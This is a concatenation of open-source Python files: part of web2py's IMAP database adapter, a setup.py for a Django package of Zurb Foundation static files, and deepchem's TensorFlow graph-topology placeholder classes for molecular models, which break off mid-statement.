pairs.
"""
if mailbox_names:
# optional statically declared mailboxes
self.static_names = mailbox_names
else:
self.static_names = None
if not isinstance(self.connection.mailbox_names, dict):
self.get_mailboxes()
names = self.connection.mailbox_names.keys()
for name in names:
self.db.define_table("%s" % name,
Field("uid", writable=False),
Field("created", "datetime", writable=False),
Field("content", "text", writable=False),
Field("to", writable=False),
Field("cc", writable=False),
Field("bcc", writable=False),
Field("sender", writable=False),
Field("size", "integer", writable=False),
Field("subject", writable=False),
Field("mime", writable=False),
Field("email", "text", writable=False, readable=False),
Field("attachments", "text", writable=False, readable=False),
Field("encoding", writable=False),
Field("answered", "boolean"),
Field("deleted", "boolean"),
Field("draft", "boolean"),
Field("flagged", "boolean"),
Field("recent", "boolean", writable=False),
Field("seen", "boolean")
)
# Set a special _mailbox attribute for storing
# native mailbox names
self.db[name].mailbox = \
self.connection.mailbox_names[name]
# decode quoted printable
self.db[name].to.represent = self.db[name].cc.represent = \
self.db[name].bcc.represent = self.db[name].sender.represent = \
self.db[name].subject.represent = self.header_represent
# Set the db instance mailbox collections
self.db.mailboxes = self.connection.mailbox_names
return self.db.mailboxes
def create_table(self, *args, **kwargs):
# not implemented
# but required by DAL
pass
def select(self, query, fields, attributes):
""" Searches and Fetches records and return web2py rows
"""
# move this statement elsewhere (upper-level)
if use_common_filters(query):
query = self.common_filter(query, [self.get_query_mailbox(query),])
import email
# get records from imap server with search + fetch
# convert results to a dictionary
tablename = None
fetch_results = list()
if isinstance(query, Query):
tablename = self.get_table(query)._dalname
mailbox = self.connection.mailbox_names.get(tablename, None)
if mailbox is None:
raise ValueError("Mailbox name not found: %s" % mailbox)
else:
# select with readonly
result, selected = self.connection.select(mailbox, True)
if result != "OK":
raise Exception("IMAP error: %s" % selected)
self.mailbox_size = int(selected[0])
search_query = "(%s)" % str(query).strip()
search_result = self.connection.uid("search", None, search_query)
# Normal IMAP response OK is assumed (change this)
if search_result[0] == "OK":
# For "light" remote server responses just get the first
# ten records (change for non-experimental implementation)
# However, light responses are not guaranteed with this
# approach, just fewer messages.
limitby = attributes.get('limitby', None)
messages_set = search_result[1][0].split()
# descending order
messages_set.reverse()
if limitby is not None:
# TODO: orderby, asc/desc, limitby from complete message set
messages_set = messages_set[int(limitby[0]):int(limitby[1])]
# keep the requests small for header/flags
if any([(field.name in ["content", "size",
"attachments", "email"]) for
field in fields]):
imap_fields = "(RFC822 FLAGS)"
else:
imap_fields = "(RFC822.HEADER FLAGS)"
if len(messages_set) > 0:
# create fetch results object list
# fetch each remote message and store it in memmory
# (change to multi-fetch command syntax for faster
# transactions)
for uid in messages_set:
# fetch the RFC822 message body
typ, data = self.connection.uid("fetch", uid, imap_fields)
if typ == "OK":
fr = {"message": int(data[0][0].split()[0]),
"uid": long(uid),
"email": email.message_from_string(data[0][1]),
"raw_message": data[0][1]}
fr["multipart"] = fr["email"].is_multipart()
# fetch flags for the message
if PY2:
fr["flags"] = self.driver.ParseFlags(data[1])
else:
fr["flags"] = self.driver.ParseFlags(
bytes(data[1], "utf-8"))
fetch_results.append(fr)
else:
# error retrieving the message body
raise Exception("IMAP error retrieving the body: %s" % data)
else:
raise Exception("IMAP search error: %s" % search_result[1])
elif isinstance(query, (Expression, basestring)):
raise NotImplementedError()
else:
raise TypeError("Unexpected query type")
imapqry_dict = {}
imapfields_dict = {}
if len(fields) == 1 and isinstance(fields[0], SQLALL):
allfields = True
elif len(fields) == 0:
allfields = True
else:
allfields = False
if allfields:
colnames = ["%s.%s" % (tablename, field) for field in self.search_fields.keys()]
else:
colnames = [field.longname for field in fields]
for k in colnames:
imapfields_dict[k] = k
imapqry_list = list()
imapqry_array = list()
for fr in fetch_results:
attachments = []
content = []
size = 0
n = int(fr["message"])
item_dict = dict()
message = fr["email"]
uid = fr["uid"]
charset = self.get_charset(message)
flags = fr["flags"]
raw_message = fr["raw_message"]
# Return messages data mapping static fields
# and fetched results. Mapping should be made
# outside the select function (with auxiliary
# instance methods)
# pending: search flags states trough the email message
# instances for correct output
# preserve subject encoding (ASCII/quoted printable)
if "%s.id" % tablename in colnames:
item_dict["%s.id" % tablename] = n
if "%s.created" % tablename in colnames:
item_dict["%s.created" % tablename] = self.convert_date(message["Date"])
if "%s.uid" % tablename in colnames:
item_dict["%s.uid" % tablename] = uid
if "%s.sender" % tablename in colnames:
# If there is no encoding found in the message header
# force utf-8 replacing characters (change this to
# module's defaults). Applies to .sender, .to, .cc and .bcc fields
item_dict["%s.sender" % tablename] = message["From"]
if "%s.to" % tablename in colnames:
item_dict["%s.to" % tablename] = message["To"]
if "%s.cc" % tablename in colnames:
if "Cc" in message.keys():
item_dict["%s.cc" % tablename] = message["Cc"]
else:
item_dict["%s.cc" % tablename] = ""
if "%s.bcc" % tablename in colnames:
if "Bcc" in message.keys():
item_dict["%s.bcc" % tablename] = message["Bcc"]
else:
item_dict["%s.bcc" % tablename] = ""
if "%s.deleted" % tablename in colnames:
item_dict["%s.deleted" % tablename] = "\\Deleted" in flags
if "%s.draft" % tablename in colnames:
item_dict["%s.draft" % tablename] = "\\Draft" in flags
if "%s.flagged" % tablename in colnames:
item_dict["%s.flagged" % tablename] = "\\Flagged" in flags
if "%s.recent" % tablename in colnames:
item_dict["%s.recent" % tablename] = "\\Recent" in flags
if "%s.seen" % tablename in colnames:
item_dict["%s.seen" % tablename] = "\\Seen" in flags
if "%s.subject" % tablename in colnames:
item_dict["%s.subject" % tablename] = message["Subject"]
if "%s.answered" % tablename in colnames:
item_dict["%s.answered" % tablename] = "\\Answered" in flags
if "%s.mime" % tablename in colnames:
item_dict["%s.mime" % tablename] = message.get_content_type()
if "%s.encoding" % tablename in colnames:
item_dict["%s.encoding" % tablename] = charset
# Here goes the whole RFC822 body as an email instance
# for controller side custom processing
# The message is stored as a raw string
# >> email.message_from_string(raw string)
# returns a Message object for enhanced object processing
if "%s.email" % tablename in colnames:
# WARNING: no encoding performed (raw message)
item_dict["%s.email" % tablename] = raw_message
# Size measure as suggested in a Velocity Reviews post
# by Tim Williams: "how to get size of email attachment"
            # Note: len() and the server's RFC822.SIZE reports don't match
# To retrieve the server size for representation would add a new
# fetch transaction to the process
for part in message.walk():
maintype = part.get_content_maintype()
if ("%s.attachments" % tablename in colnames) or \
("%s.content" % tablename in colnames):
payload = part.get_payload(decode=True)
if payload:
filename = part.get_filename()
values = {"mime": part.get_content_type()}
if ((filename or not "text" in maintype) and
("%s.attachments" % tablename in colnames)):
values.update({"payload": payload,
"filename": filename,
"encoding": part.get_content_charset(),
"disposition": part["Content-Disposition"]})
attachments.append(values)
elif (("text" in maintype) and
("%s.content" % tablename in colnames)):
values.update({"text": self.encode_text(payload,
self.get_charset(part))})
content.append(values)
if "%s.size" % tablename in colnames:
if part is not None:
size += len(str(part))
item_dict["%s.content" % tablename] = content
item_dict["%s.attachments" % tablename] = attachments
item_dict["%s.size" % tablename] = size
imapqry_list.append(item_dict)
# extra object mapping for the sake of rows object
# creation (sends an array or lists)
for item_dict in imapqry_list:
imapqry_array_item = list()
for fieldname in colnames:
imapqry_array_item.append(item_dict[fieldname])
imapqry_array.append(imapqry_array_item)
# parse result and return a rows object
colnames = colnames
processor = attributes.get('processor',self.parse)
return processor(imapqry_array, fields, colnames)
def insert(self, table, fields):
def add_payload(message, obj):
payload = Message()
encoding = obj.get("encoding", "utf-8")
if encoding and (encoding.upper() in
("BASE64", "7BIT", "8BIT", "BINARY")):
payload.add_header("Content-Transfer-Encoding", encoding)
else:
payload.set_charset(encoding)
mime = obj.get("mime", None)
if mime:
payload.set_type(mime)
if "text" in obj:
payload.set_payload(obj["text"])
elif "payload" in obj:
payload.set_payload(obj["payload"])
if "filename" in obj and obj["filename"]:
payload.add_header("Content-Disposition",
"attachment", filename=obj["filename"])
message.attach(payload)
mailbox = table.mailbox
d = dict(((k.name, v) for k, v in fields))
date_time = d.get("created") or datetime.datetime.now()
struct_time = date_time.timetuple()
if len(d) > 0:
message = d.get("email", None)
attachments = d.get("attachments", [])
content = d.get("content", [])
flags = " ".join(["\\%s" % flag.capitalize() for flag in
("answered", "deleted", "draft", "flagged",
"recent", "seen") if d.get(flag, False)])
if not message:
from email.message import Message
mime = d.get("mime", None)
charset = d.get("encoding", None)
message = Message()
message["from"] = d.get("sender", "")
message["subject"] = d.get("subject", "")
message["date"] = self.convert_date(date_time, imf=True)
if mime:
message.set_type(mime)
if charset:
message.set_charset(charset)
for item in ("to", "cc", "bcc"):
value = d.get(item, "")
if isinstance(value, basestring):
message[item] = value
else:
message[item] = ";".join([i for i in
value])
if (not message.is_multipart() and
(not message.get_content_type().startswith(
"multipart"))):
if isinstance(content, basestring):
message.set_payload(content)
elif len(content) > 0:
message.set_payload(content[0]["text"])
else:
[add_payload(message, c) for c in content]
[add_payload(message, a) for a in attachments]
message = message.as_string()
result, data = self.connection.append(mailbox, flags, struct_time, message)
if result == "OK":
uid = int(re.findall("\d+", str(data))[-1])
return self.db(table.uid==uid).select(table.id).first().id
else:
raise Exception("IMAP message append failed: %s" % data)
else:
raise NotImplementedError("IMAP empty insert is not implemented")
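    # Illustrative sketch (mailbox name assumed): composing a new message
    # through the DAL insert interface; the adapter builds the RFC822
    # message and appends it to the mailbox with the requested flags:
    #
    #   imapdb.Drafts.insert(to="[email protected]",
    #                        subject="hello",
    #                        draft=True,
    #                        content=[{"text": "message body"}])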
def update(self, table, query, fields):
# TODO: the adapter should implement an .expand method
commands = list()
rowcount = 0
tablename = table._dalname
if use_common_filters(query):
query = self.common_filter(query, [tablename,])
mark = []
unmark = []
if query:
for item in fields:
field = item[0]
name = field.name
value = item[1]
if self.is_flag(name):
flag = self.search_fields[name]
if (value is not None) and (flag != "\\Recent"):
if value:
mark.append(flag)
else:
unmark.append(flag)
result, data = self.connection.select(
self.connection.mailbox_names[tablename])
string_query = "(%s)" % query
result, data = self.connection.search(None, string_query)
store_list = [item.strip() for item in data[0].split()
if item.strip().isdigit()]
# build commands for marked flags
for number in store_list:
result = None
if len(mark) > 0:
commands.append((number, "+FLAGS", "(%s)" % " ".join(mark)))
if len(unmark) > 0:
commands.append((number, "-FLAGS", "(%s)" % " ".join(unmark)))
for command in commands:
result, data = self.connection.store(*command)
if result == "OK":
rowcount += 1
else:
raise Exception("IMAP storing error: %s" % data)
return rowcount
def count(self,query,distinct=None):
counter = 0
tablename = self.get_query_mailbox(query)
if query and tablename is not None:
if use_common_filters(query):
query = self.common_filter(query, [tablename,])
result, data = self.connection.select(self.connection.mailbox_names[tablename])
string_query = "(%s)" % query
result, data = self.connection.search(None, string_query)
store_list = [item.strip() for item in data[0].split() if item.strip().isdigit()]
counter = len(store_list)
return counter
def delete(self, table, query):
counter = 0
tablename = table._dalname
if query:
if use_common_filters(query):
query = self.common_filter(query, [tablename,])
result, data = self.connection.select(self.connection.mailbox_names[tablename])
string_query = "(%s)" % query
result, data = self.connection.search(None, string_query)
store_list = [item.strip() for item in data[0].split() if item.strip().isdigit()]
for number in store_list:
result, data = self.connection.store(number, "+FLAGS", "(\\Deleted)")
if result == "OK":
counter += 1
else:
raise Exception("IMAP store error: %s" % data)
if counter > 0:
result, data = self.connection.expunge()
return counter
def BELONGS(self, first, second):
result = None
name = self.search_fields[first.name]
if name == "MESSAGE":
values = [str(val) for val in second if str(val).isdigit()]
result = "%s" % ",".join(values).strip()
elif name == "UID":
values = [str(val) for val in second if str(val).isdigit()]
result = "UID %s" % ",".join(values).strip()
else:
raise Exception("Operation not supported")
# result = "(%s %s)" % (self.expand(first), self.expand(second))
return result
def CONTAINS(self, first, second, case_sensitive=False):
# silently ignore, only case sensitive
result = None
name = self.search_fields[first.name]
if name in ("FROM", "TO", "SUBJECT", "TEXT"):
result = "%s \"%s\"" % (name, self.expand(second))
else:
if first.name in ("cc", "bcc"):
result = "%s \"%s\"" % (first.name.upper(), self.expand(second))
elif first.name == "mime":
result = "HEADER Content-Type \"%s\"" % self.expand(second)
else:
raise Exception("Operation not supported")
return result
def GT(self, first, second):
result = None
name = self.search_fields[first.name]
if name == "MESSAGE":
last_message = self.get_last_message(first.tablename)
result = "%d:%d" % (int(self.expand(second)) + 1, last_message)
elif name == "UID":
# GT and LT may not return
# expected sets depending on
# the uid format implemented
try:
pedestal, threshold = self.get_uid_bounds(first.tablename)
except TypeError:
e = sys.exc_info()[1]
self.db.logger.debug("Error requesting uid bounds: %s", str(e))
return ""
try:
lower_limit = int(self.expand(second)) + 1
except (ValueError, TypeError):
e = sys.exc_info()[1]
raise Exception("Operation not supported (non integer UID)")
result = "UID %s:%s" % (lower_limit, threshold)
elif name == "DATE":
result = "SINCE %s" % self.convert_date(second, add=datetime.timedelta(1))
elif name == "SIZE":
result = "LARGER %s" % self.expand(second)
else:
raise Exception("Operation not supported")
return result
def GE(self, first, second):
result = None
name = self.search_fields[first.name]
if name == "MESSAGE":
last_message = self.get_last_message(first.tablename)
result = "%s:%s" % (self.expand(second), last_message)
elif name == "UID":
# GT and LT may not return
# expected sets depending on
# the uid format implemented
try:
pedestal, threshold = self.get_uid_bounds(first.tablename)
except TypeError:
e = sys.exc_info()[1]
self.db.logger.debug("Error requesting uid bounds: %s", str(e))
return ""
lower_limit = self.expand(second)
result = "UID %s:%s" % (lower_limit, threshold)
elif name == "DATE":
result = "SINCE %s" % self.convert_date(second)
else:
raise Exception("Operation not supported")
return result
def LT(self, first, second):
result = None
name = self.search_fields[first.name]
if name == "MESSAGE":
result = "%s:%s" % (1, int(self.expand(second)) - 1)
elif name == "UID":
try:
pedestal, threshold = self.get_uid_bounds(first.tablename)
except TypeError:
e = sys.exc_info()[1]
self.db.logger.debug("Error requesting uid bounds: %s", str(e))
return ""
try:
upper_limit = int(self.expand(second)) - 1
except (ValueError, TypeError):
e = sys.exc_info()[1]
raise Exception("Operation not supported (non integer UID)")
result = "UID %s:%s" % (pedestal, upper_limit)
elif name == "DATE":
result = "BEFORE %s" % self.convert_date(second)
elif name == "SIZE":
result = "SMALLER %s" % self.expand(second)
else:
raise Exception("Operation not supported")
return result
def LE(self, first, second):
result = None
name = self.search_fields[first.name]
if name == "MESSAGE":
result = "%s:%s" % (1, self.expand(second))
elif name == "UID":
try:
pedestal, threshold = self.get_uid_bounds(first.tablename)
except TypeError:
e = sys.exc_info()[1]
self.db.logger.debug("Error requesting uid bounds: %s", str(e))
return ""
upper_limit = int(self.expand(second))
result = "UID %s:%s" % (pedestal, upper_limit)
elif name == "DATE":
result = "BEFORE %s" % self.convert_date(second, add=datetime.timedelta(1))
else:
raise Exception("Operation not supported")
return result
def NE(self, first, second=None):
if (second is None) and isinstance(first, Field):
# All records special table query
if first.type == "id":
return self.GE(first, 1)
result = self.NOT(self.EQ(first, second))
result = result.replace("NOT NOT", "").strip()
return result
def EQ(self,first,second):
name = self.search_fields[first.name]
result = None
if name is not None:
if name == "MESSAGE":
# query by message sequence number
result = "%s" % self.expand(second)
elif name == "UID":
result = "UID %s" % self.expand(second)
elif name == "DATE":
result = "ON %s" % self.convert_date(second)
elif name in self.flags.values():
if second:
result = "%s" % (name.upper()[1:])
else:
result = "NOT %s" % (name.upper()[1:])
else:
raise Exception("Operation not supported")
else:
raise Exception("Operation not supported")
return result
def AND(self, first, second):
result = "%s %s" % (self.expand(first), self.expand(second))
return result
def OR(self, first, second):
result = "OR %s %s" % (self.expand(first), self.expand(second))
return "%s" % result.replace("OR OR", "OR")
def NOT(self, first):
result = "NOT %s" % self.expand(first)
return result
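    # Illustrative sketch: the operator methods above expand a DAL query
    # into IMAP SEARCH syntax before .select()/.count() wraps it in
    # parentheses, e.g. (assuming an INBOX table):
    #
    #   (imapdb.INBOX.seen == False) & (imapdb.INBOX.size < 6000)
    #   # expands to: NOT SEEN SMALLER 6000
    #   imapdb.INBOX.subject.contains("invoice")
    #   # expands to: SUBJECT "invoice"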
| apache-2.0 | 6,151,325,805,287,477,000 | 39.879392 | 120 | 0.519421 | false |
benbacardi/django-foundation-statics | setup.py | 1 | 1443 | from setuptools import setup
setup(
name='django-foundation-statics',
version='5.4.7-2',
url='https://github.com/benbacardi/django-foundation-statics',
description='Zurb Foundation (http://foundation.zurb.com) static files packaged in a django app to speed up new applications and deployment.',
author='Ben Cardy',
author_email='[email protected]',
license='MIT',
keywords='django zurb foundation staticfiles'.split(),
platforms='any',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities',
],
packages=['foundation', 'foundation_scss'],
package_data={
'foundation': [
'static/js/*.js',
'static/js/foundation/*.js',
'static/js/vendor/*.js',
'static/css/*.css',
],
'foundation_scss': [
'static/js/*.js',
'static/js/foundation/*.js',
'static/js/vendor/*.js',
'static/scss/*.scss',
'static/scss/foundation/*.scss',
'static/scss/foundation/components/*.scss'
],
},
include_package_data=True,
)
| mit | 5,779,507,622,633,271,000 | 33.357143 | 146 | 0.577963 | false |
joegomes/deepchem | deepchem/models/tf_new_models/graph_topology.py | 1 | 16190 | """Manages Placeholders for Graph convolution networks.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
__author__ = "Han Altae-Tran and Bharath Ramsundar"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "MIT"
import numpy as np
import tensorflow as tf
from deepchem.nn.copy import Input
from deepchem.feat.mol_graphs import ConvMol
def merge_two_dicts(x, y):
z = x.copy()
z.update(y)
return z
def merge_dicts(l):
"""Convenience function to merge list of dictionaries."""
merged = {}
  for each_dict in l:
    merged = merge_two_dicts(merged, each_dict)
return merged
class GraphTopology(object):
"""Manages placeholders associated with batch of graphs and their topology"""
def __init__(self, n_feat, name='topology', max_deg=10, min_deg=0):
"""
Note that batch size is not specified in a GraphTopology object. A batch
of molecules must be combined into a disconnected graph and fed to topology
directly to handle batches.
Parameters
----------
n_feat: int
Number of features per atom.
name: str, optional
Name of this manager.
max_deg: int, optional
Maximum #bonds for atoms in molecules.
min_deg: int, optional
Minimum #bonds for atoms in molecules.
"""
#self.n_atoms = n_atoms
self.n_feat = n_feat
self.name = name
self.max_deg = max_deg
self.min_deg = min_deg
self.atom_features_placeholder = tensor = tf.placeholder(
dtype='float32',
shape=(None, self.n_feat),
name=self.name + '_atom_features')
self.deg_adj_lists_placeholders = [
tf.placeholder(
dtype='int32',
shape=(None, deg),
name=self.name + '_deg_adj' + str(deg))
for deg in range(1, self.max_deg + 1)
]
self.deg_slice_placeholder = tf.placeholder(
dtype='int32',
shape=(self.max_deg - self.min_deg + 1, 2),
name=self.name + '_deg_slice')
self.membership_placeholder = tf.placeholder(
dtype='int32', shape=(None,), name=self.name + '_membership')
# Define the list of tensors to be used as topology
self.topology = [self.deg_slice_placeholder, self.membership_placeholder]
self.topology += self.deg_adj_lists_placeholders
self.inputs = [self.atom_features_placeholder]
self.inputs += self.topology
def get_input_placeholders(self):
"""All placeholders.
Contains atom_features placeholder and topology placeholders.
"""
return self.inputs
def get_topology_placeholders(self):
"""Returns topology placeholders
Consists of deg_slice_placeholder, membership_placeholder, and the
deg_adj_list_placeholders.
"""
return self.topology
def get_atom_features_placeholder(self):
return self.atom_features_placeholder
def get_deg_adjacency_lists_placeholders(self):
return self.deg_adj_lists_placeholders
def get_deg_slice_placeholder(self):
return self.deg_slice_placeholder
def get_membership_placeholder(self):
return self.membership_placeholder
def batch_to_feed_dict(self, batch):
"""Converts the current batch of mol_graphs into tensorflow feed_dict.
    Assigns the graph information in the array of ConvMol objects to the
    placeholder tensors
    Parameters
    ----------
batch : np.ndarray
Array of ConvMol objects
    Returns
    -------
feed_dict : dict
Can be merged with other feed_dicts for input into tensorflow
"""
# Merge mol conv objects
batch = ConvMol.agglomerate_mols(batch)
atoms = batch.get_atom_features()
deg_adj_lists = [
batch.deg_adj_lists[deg] for deg in range(1, self.max_deg + 1)
]
# Generate dicts
deg_adj_dict = dict(
list(zip(self.deg_adj_lists_placeholders, deg_adj_lists)))
atoms_dict = {
self.atom_features_placeholder: atoms,
self.deg_slice_placeholder: batch.deg_slice,
self.membership_placeholder: batch.membership
}
return merge_dicts([atoms_dict, deg_adj_dict])
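  # Illustrative sketch (not part of the class): a typical pipeline builds
  # the feed for a batch of ConvMol objects and merges it with label and
  # weight feeds before session.run; n_feat=75 is an assumed feature size:
  #
  #   topology = GraphTopology(n_feat=75)
  #   feed_dict = topology.batch_to_feed_dict(mols)
  #   # merge with other placeholder feeds via merge_dicts([...])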
class DTNNGraphTopology(GraphTopology):
"""Manages placeholders associated with batch of graphs and their topology"""
def __init__(self,
max_n_atoms,
n_distance=100,
distance_min=-1.,
distance_max=18.,
name='DTNN_topology'):
"""
Parameters
----------
max_n_atoms: int
maximum number of atoms in a molecule
n_distance: int, optional
granularity of distance matrix
step size will be (distance_max-distance_min)/n_distance
distance_min: float, optional
      minimum distance of atom pairs, default = -1 Angstrom
    distance_max: float, optional
      maximum distance of atom pairs, default = 18 Angstrom
"""
#self.n_atoms = n_atoms
self.name = name
self.max_n_atoms = max_n_atoms
self.n_distance = n_distance
self.distance_min = distance_min
self.distance_max = distance_max
self.atom_number_placeholder = tf.placeholder(
dtype='int32',
shape=(None, self.max_n_atoms),
name=self.name + '_atom_number')
self.atom_mask_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_n_atoms),
name=self.name + '_atom_mask')
self.distance_matrix_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_n_atoms, self.max_n_atoms, self.n_distance),
name=self.name + '_distance_matrix')
self.distance_matrix_mask_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_n_atoms, self.max_n_atoms),
name=self.name + '_distance_matrix_mask')
# Define the list of tensors to be used as topology
self.topology = [
self.distance_matrix_placeholder, self.distance_matrix_mask_placeholder
]
self.inputs = [self.atom_number_placeholder]
self.inputs += self.topology
def get_atom_number_placeholder(self):
return self.atom_number_placeholder
def get_distance_matrix_placeholder(self):
return self.distance_matrix_placeholder
def batch_to_feed_dict(self, batch):
"""Converts the current batch of Coulomb Matrix into tensorflow feed_dict.
Assigns the atom number and distance info to the
placeholders tensors
    Parameters
    ----------
batch : np.ndarray
Array of Coulomb Matrix
    Returns
    -------
feed_dict : dict
Can be merged with other feed_dicts for input into tensorflow
"""
# Extract atom numbers
atom_number = np.asarray(list(map(np.diag, batch)))
atom_mask = np.sign(atom_number)
atom_number = np.asarray(
np.round(np.power(2 * atom_number, 1 / 2.4)), dtype=int)
ZiZj = []
for molecule in atom_number:
ZiZj.append(np.outer(molecule, molecule))
ZiZj = np.asarray(ZiZj)
distance_matrix = np.expand_dims(batch[:], axis=3)
distance_matrix = np.concatenate(
[distance_matrix] * self.n_distance, axis=3)
distance_matrix_mask = batch[:]
for im, molecule in enumerate(batch):
for ir, row in enumerate(molecule):
for ie, element in enumerate(row):
if element > 0 and ir != ie:
# expand a float value distance to a distance vector
distance_matrix[im, ir, ie, :] = self.gauss_expand(
ZiZj[im, ir, ie] / element, self.n_distance, self.distance_min,
self.distance_max)
distance_matrix_mask[im, ir, ie] = 1
else:
distance_matrix[im, ir, ie, :] = 0
distance_matrix_mask[im, ir, ie] = 0
# Generate dicts
dict_DTNN = {
self.atom_number_placeholder: atom_number,
self.atom_mask_placeholder: atom_mask,
self.distance_matrix_placeholder: distance_matrix,
self.distance_matrix_mask_placeholder: distance_matrix_mask
}
return dict_DTNN
@staticmethod
def gauss_expand(distance, n_distance, distance_min, distance_max):
step_size = (distance_max - distance_min) / n_distance
steps = np.array([distance_min + i * step_size for i in range(n_distance)])
distance_vector = np.exp(-np.square(distance - steps) / (2 * step_size**2))
return distance_vector
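  # Illustrative sketch: gauss_expand places n_distance Gaussian centers
  # mu_i = distance_min + i * step on the distance axis and returns
  # exp(-(d - mu_i)**2 / (2 * step**2)) for i = 0..n_distance-1, turning a
  # scalar distance into a soft one-hot vector, e.g.
  #
  #   DTNNGraphTopology.gauss_expand(5.0, 100, -1., 18.)  # shape (100,)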
class DAGGraphTopology(GraphTopology):
"""GraphTopology for DAG models
"""
def __init__(self, n_feat, batch_size, name='topology', max_atoms=50):
self.n_feat = n_feat
self.name = name
self.max_atoms = max_atoms
self.batch_size = batch_size
self.atom_features_placeholder = tf.placeholder(
dtype='float32',
shape=(self.batch_size * self.max_atoms, self.n_feat),
name=self.name + '_atom_features')
self.parents_placeholder = tf.placeholder(
dtype='int32',
shape=(self.batch_size * self.max_atoms, self.max_atoms,
self.max_atoms),
# molecule * atom(graph) => step => features
name=self.name + '_parents')
self.calculation_orders_placeholder = tf.placeholder(
dtype='int32',
shape=(self.batch_size * self.max_atoms, self.max_atoms),
# molecule * atom(graph) => step
name=self.name + '_orders')
self.membership_placeholder = tf.placeholder(
dtype='int32',
shape=(self.batch_size * self.max_atoms),
name=self.name + '_membership')
# Define the list of tensors to be used as topology
self.topology = [
self.parents_placeholder, self.calculation_orders_placeholder,
self.membership_placeholder
]
self.inputs = [self.atom_features_placeholder]
self.inputs += self.topology
def get_parents_placeholder(self):
return self.parents_placeholder
def get_calculation_orders_placeholder(self):
return self.calculation_orders_placeholder
def batch_to_feed_dict(self, batch):
"""Converts the current batch of mol_graphs into tensorflow feed_dict.
    Assigns the graph information in the array of ConvMol objects to the
    placeholder tensors for DAG models
    Parameters
    ----------
batch : np.ndarray
Array of ConvMol objects
    Returns
    -------
feed_dict : dict
Can be merged with other feed_dicts for input into tensorflow
"""
atoms_per_mol = [mol.get_num_atoms() for mol in batch]
n_atom_features = batch[0].get_atom_features().shape[1]
membership = np.concatenate(
[
np.array([1] * n_atoms + [0] * (self.max_atoms - n_atoms))
for i, n_atoms in enumerate(atoms_per_mol)
],
axis=0)
atoms_all = []
# calculation orders for a batch of molecules
parents_all = []
calculation_orders = []
for idm, mol in enumerate(batch):
# padding atom features vector of each molecule with 0
atom_features_padded = np.concatenate(
[
mol.get_atom_features(), np.zeros(
(self.max_atoms - atoms_per_mol[idm], n_atom_features))
],
axis=0)
atoms_all.append(atom_features_padded)
# calculation orders for DAGs
parents = mol.parents
# number of DAGs should equal number of atoms
assert len(parents) == atoms_per_mol[idm]
parents_all.extend(parents[:])
# padding with `max_atoms`
parents_all.extend([
self.max_atoms * np.ones((self.max_atoms, self.max_atoms), dtype=int)
for i in range(self.max_atoms - atoms_per_mol[idm])
])
for parent in parents:
        # the index of an atom differs between `parents_all` and `atoms_all`;
        # this call changes the index from the position in the current
        # molecule (DAGs, `parents_all`) to the position in the batch of
        # molecules (`atoms_all`); only used in tf.gather on
        # `atom_features_placeholder`
calculation_orders.append(self.index_changing(parent[:, 0], idm))
# padding with `batch_size*max_atoms`
calculation_orders.extend([
self.batch_size * self.max_atoms * np.ones(
(self.max_atoms,), dtype=int)
for i in range(self.max_atoms - atoms_per_mol[idm])
])
atoms_all = np.concatenate(atoms_all, axis=0)
parents_all = np.stack(parents_all, axis=0)
calculation_orders = np.stack(calculation_orders, axis=0)
atoms_dict = {
self.atom_features_placeholder: atoms_all,
self.membership_placeholder: membership,
self.parents_placeholder: parents_all,
self.calculation_orders_placeholder: calculation_orders
}
return atoms_dict
def index_changing(self, index, n_mol):
output = np.zeros_like(index)
for ide, element in enumerate(index):
if element < self.max_atoms:
output[ide] = element + n_mol * self.max_atoms
else:
output[ide] = self.batch_size * self.max_atoms
return output
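  # Illustrative sketch: with max_atoms=50 and batch_size=64 (assumed),
  # atom index 3 inside molecule 2 maps to the batch-wide row used by
  # tf.gather on atom_features_placeholder:
  #
  #   3 + 2 * 50 = 103
  #
  # while the padding index max_atoms (50) maps to the sentinel row
  # batch_size * max_atoms (3200), past all real atoms.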
class WeaveGraphTopology(GraphTopology):
"""Manages placeholders associated with batch of graphs and their topology"""
def __init__(self, max_atoms, n_atom_feat, n_pair_feat,
name='Weave_topology'):
"""
Parameters
----------
max_atoms: int
maximum number of atoms in a molecule
n_atom_feat: int
number of basic features of each atom
n_pair_feat: int
number of basic features of each pair
"""
#self.n_atoms = n_atoms
self.name = name
self.max_atoms = max_atoms
self.n_atom_feat = n_atom_feat
self.n_pair_feat = n_pair_feat
self.atom_features_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_atoms, self.n_atom_feat),
name=self.name + '_atom_features')
self.atom_mask_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_atoms),
name=self.name + '_atom_mask')
self.pair_features_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_atoms, self.max_atoms, self.n_pair_feat),
name=self.name + '_pair_features')
self.pair_mask_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_atoms, self.max_atoms),
name=self.name + '_pair_mask')
self.membership_placeholder = tf.placeholder(
dtype='int32', shape=(None,), name=self.name + '_membership')
# Define the list of tensors to be used as topology
self.topology = [self.atom_mask_placeholder, self.pair_mask_placeholder]
self.inputs = [self.atom_features_placeholder]
self.inputs += self.topology
def get_pair_features_placeholder(self):
return self.pair_features_placeholder
def batch_to_feed_dict(self, batch):
"""Converts the current batch of WeaveMol into tensorflow feed_dict.
Assigns the atom features and pair features to the
placeholders tensors
params
------
batch : np.ndarray
Array of WeaveMol
returns
-------
feed_dict : dict
Can be merged with other feed_dicts for input into tensorflow
"""
# Extract atom numbers
atom_feat = []
pair_feat = []
atom_mask = []
pair_mask = []
membership = []
max_atoms = self.max_atoms
for im, mol in enumerate(batch):
n_atoms = mol.get_num_atoms()
atom_feat.append(
np.pad(mol.get_atom_features(), ((0, max_atoms - n_atoms), (0, 0)),
'constant'))
atom_mask.append(
np.array([1] * n_atoms + [0] * (max_atoms - n_atoms), dtype=float))
pair_feat.append(
np.pad(mol.get_pair_features(), ((0, max_atoms - n_atoms), (
0, max_atoms - n_atoms), (0, 0)), 'constant'))
      pair_mask.append(
